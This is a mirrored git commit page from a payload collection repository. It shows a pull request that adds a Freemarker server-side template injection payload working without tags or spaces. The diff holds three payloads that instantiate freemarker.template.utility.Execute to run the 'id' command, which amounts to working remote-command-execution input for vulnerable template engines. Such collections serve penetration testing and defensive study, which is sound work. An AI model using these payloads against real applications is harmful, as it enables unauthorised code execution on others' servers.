mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 19:06:12 +00:00
Merge pull request #75 from scarvell/master
Added Freemarker SSTI PoC that doesn't require the use of "tags"/spaces
This commit is contained in:
commit
1cec6e9a35
@ -150,6 +150,7 @@ The template can be `${3*3}` or the legacy `#{3*3}`
|
|||||||
```js
|
```js
|
||||||
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
|
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
|
||||||
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
|
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
|
||||||
|
${"freemarker.template.utility.Execute"?new()("id")}
|
||||||
```
|
```
|
||||||
|
|
||||||
## Jade / Codepen
|
## Jade / Codepen
|
||||||
|
Loading…
Reference in New Issue
Block a user